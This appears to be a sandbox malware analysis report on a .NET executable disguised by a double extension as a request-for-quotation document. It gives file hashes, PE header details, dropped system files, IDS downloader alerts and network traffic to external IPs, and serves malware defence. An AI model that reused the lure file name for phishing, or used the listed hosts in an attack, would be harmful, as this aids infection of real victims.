SHA1:	AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
SHA-256:	B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
SHA-512:	426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
Malicious:	false
Preview:	1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

C:\Windows\System32\perfh009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	715050
Entropy (8bit):	3.278818886805871
Encrypted:	false
SSDEEP:	3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
MD5:	342BC94F85E143BE85B5B997163A0BB3
SHA1:	8780CD88D169AE88C843E19239D9A32625F6A73E
SHA-256:	F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
SHA-512:	0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
Malicious:	false
Preview:	3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.548057359158885
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
File size:	1'017'856 bytes
MD5:	1ae7a890014eba9c807c6adeabac7671
SHA1:	e3b92645849a3e064d9fc401badf115dab013839
SHA256:	bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
SHA512:	3a54469caeb4052cb4b842b30292e5ae00c9bf2a29f0d293d975d7bd0283d657c2fb4c9fd0df0797782eda78474a9eab5f8fa6d1ff66ceaf59f00e128fbab2d7
SSDEEP:	24576:Yij0gzjizxWgioJqE9p9jzOtXGnwaEalbcHNGtAlUDRL:1zjkW2H9p9PmXMOHNzUDB
TLSH:	D925BF20B7F89D67E27AA1F3EBC4821057BAD545757BE7AA0CC564CE25C27320383927
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0..^...(.......\|... ........@.. ....................................@................................

File Icon


Icon Hash:	130b253d1931012d

Static PE Info

General

Entrypoint:	0x4f7c2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673E8DF5 [Thu Nov 21 01:33:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf7bdc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf8000	0x2588	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf5c34	0xf5e00	d52324750f96cb1b1ed75d70456aab15	False	0.7465852583248602	data	7.5503065152862066	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf8000	0x2588	0x2600	b36adde2e372c2203bbf5ed3bc6bf6b1	False	0.8752055921052632	data	7.577022284364793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfc000	0xc	0x200	c20688910df94681c6dbcd844ad9a7da	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xf8100	0x2016	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9504504504504504
RT_GROUP_ICON	0xfa128	0x14	data	1.05
RT_VERSION	0xfa14c	0x23c	data	0.47027972027972026
RT_MANIFEST	0xfa398	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T12:20:12.874125+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49720	193.122.6.168	80	TCP
2024-11-21T12:20:15.264721+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49720	193.122.6.168	80	TCP
2024-11-21T12:20:16.938410+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49734	188.114.97.3	443	TCP
2024-11-21T12:20:18.108479+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49740	193.122.6.168	80	TCP
2024-11-21T12:20:18.467840+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49741	193.122.6.168	80	TCP
2024-11-21T12:20:20.211067+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49748	188.114.97.3	443	TCP
2024-11-21T12:20:20.467892+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49740	193.122.6.168	80	TCP
2024-11-21T12:20:21.655388+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49749	193.122.6.168	80	TCP
2024-11-21T12:20:22.138040+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49751	188.114.97.3	443	TCP
2024-11-21T12:20:23.624113+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49757	193.122.6.168	80	TCP
2024-11-21T12:20:25.348486+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49764	188.114.97.3	443	TCP
2024-11-21T12:20:26.637765+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49767	188.114.97.3	443	TCP
2024-11-21T12:20:28.506892+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49775	188.114.97.3	443	TCP
2024-11-21T12:20:34.843367+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49797	188.114.97.3	443	TCP
2024-11-21T12:20:37.955589+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49806	188.114.97.3	443	TCP
2024-11-21T12:20:44.227515+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49828	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 12:20:10.819808960 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:10.944809914 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:10.944937944 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:10.945334911 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:11.123337984 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:12.316953897 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:12.348850012 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:12.468478918 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:12.764905930 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:12.874125004 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:13.062580109 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:13.062635899 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:13.062730074 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:13.072967052 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:13.073004961 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.336358070 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.336424112 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:14.339795113 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:14.339808941 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.343808889 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.399410009 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:14.443325043 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.790524960 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.790584087 CET	443	49727	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:14.791111946 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:14.796613932 CET	49727	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:14.800216913 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:14.920037031 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:15.215023041 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:15.217988968 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:15.218033075 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:15.218097925 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:15.218455076 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:15.218461990 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:15.264720917 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:16.269804955 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:16.389267921 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:16.389456034 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:16.389971972 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:16.482686043 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:16.485157013 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:16.485182047 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:16.509829998 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:16.938431025 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:16.938534021 CET	443	49734	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:16.938819885 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:16.939109087 CET	49734	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:16.943092108 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:16.944828987 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:17.063242912 CET	80	49720	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:17.063344955 CET	49720	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:17.064376116 CET	80	49741	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:17.064451933 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:17.064600945 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:17.186301947 CET	80	49741	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:17.657229900 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:17.661041021 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:17.780663967 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:18.065586090 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:18.108479023 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:18.115283966 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.115323067 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:18.115386009 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.119646072 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.119653940 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:18.424809933 CET	80	49741	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:18.433665991 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.433693886 CET	443	49748	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:18.433795929 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.434091091 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:18.434099913 CET	443	49748	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:18.467839956 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:19.427109957 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:19.427203894 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:19.428699970 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:19.428720951 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:19.429049015 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:19.483500004 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:19.493510962 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:19.535351992 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:19.738532066 CET	443	49748	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:19.740494013 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:19.740518093 CET	443	49748	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.006740093 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.006805897 CET	443	49742	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.006966114 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.012706041 CET	49742	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.016134024 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.135601997 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:20.211163044 CET	443	49748	188.114.97.3	192.168.2.9
